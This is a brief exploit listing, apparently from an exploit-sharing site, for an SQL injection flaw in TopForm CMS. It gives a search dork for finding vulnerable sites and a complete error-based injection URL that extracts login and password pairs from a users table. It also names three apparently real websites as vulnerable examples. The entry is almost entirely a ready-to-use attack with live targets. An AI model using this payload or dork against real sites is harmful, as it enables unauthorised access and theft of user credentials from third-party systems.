Title: TopForm CMS Date: 17.01.2012 Author: faza02 Vuln. type: SQL Injection Dork: inurl:"index.php?issue_id=" Vendor: adminv.ru Exploit: http://[site]/?issue_id=7&cat=2'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+ Example: http://bzhi.ru/?issue_id=7&cat=2' http://www.mandrogi.ru/?issue_id=85' http://lensvet.com/index.php?issue_id=25'